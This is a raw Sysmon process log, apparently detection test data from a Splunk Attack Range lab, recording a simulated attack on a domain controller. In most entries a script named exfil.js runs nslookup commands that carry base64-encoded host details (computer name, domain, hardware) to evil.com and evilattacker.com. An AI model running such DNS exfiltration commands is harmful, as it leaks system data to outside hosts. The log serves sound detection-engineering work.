(rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-420E-00000000AE01}6044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleiahvpw.tmp 2>&1 154100x800000000000000068516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.465{A8622C2F-593E-6078-420E-00000000AE01}6044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleiahvpw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.299{A8622C2F-593E-6078-410E-00000000AE01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:20.404{A8622C2F-593C-6078-400E-00000000AE01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068473Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:19.887{A8622C2F-593B-6078-3F0E-00000000AE01}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:19.231{A8622C2F-593B-6078-3E0E-00000000AE01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068418Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:17.299{A8622C2F-5939-6078-3D0E-00000000AE01}5168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:17.209{A8622C2F-5939-6078-3C0E-00000000AE01}7044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5939-6078-3A0E-00000000AE01}4604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhakdwt.tmp 2>&1 154100x800000000000000068399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:17.178{A8622C2F-5939-6078-3A0E-00000000AE01}4604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhakdwt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:16.632{A8622C2F-5938-6078-390E-00000000AE01}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:16.105{A8622C2F-5938-6078-380E-00000000AE01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068323Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:10.090{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000068284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.972{A8622C2F-592C-6078-360E-00000000AE01}4976C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-340E-00000000AE01}6652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyqzr.tmp 2>&1 154100x800000000000000068273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.943{A8622C2F-592C-6078-340E-00000000AE01}6652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyqzr.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068264Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.928{A8622C2F-592C-6078-330E-00000000AE01}5200C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-310E-00000000AE01}5632C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmpqb.tmp 2>&1 154100x800000000000000068253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.899{A8622C2F-592C-6078-310E-00000000AE01}5632C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmpqb.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.884{A8622C2F-592C-6078-300E-00000000AE01}6108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-2E0E-00000000AE01}920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkud.tmp 2>&1 154100x800000000000000068233Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.856{A8622C2F-592C-6078-2E0E-00000000AE01}920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkud.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068224Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.839{A8622C2F-592C-6078-2D0E-00000000AE01}6432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-2B0E-00000000AE01}5444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlinmwq.tmp 2>&1 154100x800000000000000068211Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.811{A8622C2F-592C-6078-2B0E-00000000AE01}5444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlinmwq.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:58.531{A8622C2F-5926-6078-2A0E-00000000AE01}5316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5926-6078-280E-00000000AE01}5396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohxy.tmp 2>&1 154100x800000000000000068169Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:58.501{A8622C2F-5926-6078-280E-00000000AE01}5396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohxy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:52.391{A8622C2F-5920-6078-270E-00000000AE01}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5920-6078-250E-00000000AE01}2344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhhaujp.tmp 2>&1 154100x800000000000000068099Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:52.362{A8622C2F-5920-6078-250E-00000000AE01}2344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhhaujp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068071Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:49.256{A8622C2F-591D-6078-240E-00000000AE01}3264C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /displaydnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-591D-6078-230E-00000000AE01}6108C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000068052Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:49.246{A8622C2F-591D-6078-230E-00000000AE01}6108C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000068033Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:47.707{A8622C2F-591B-6078-220E-00000000AE01}4940C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /flushdnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-591B-6078-210E-00000000AE01}5756C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000068014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:47.665{A8622C2F-591B-6078-210E-00000000AE01}5756C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000067934Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:34.729{A8622C2F-590E-6078-200E-00000000AE01}644C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-590E-6078-1E0E-00000000AE01}5184C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlesieai.tmp 2>&1 154100x800000000000000067923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:34.700{A8622C2F-590E-6078-1E0E-00000000AE01}5184C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlesieai.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:27.082{A8622C2F-5907-6078-1D0E-00000000AE01}6084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5907-6078-1B0E-00000000AE01}5444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliwyzly.tmp 2>&1 154100x800000000000000067871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:27.051{A8622C2F-5907-6078-1B0E-00000000AE01}5444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A 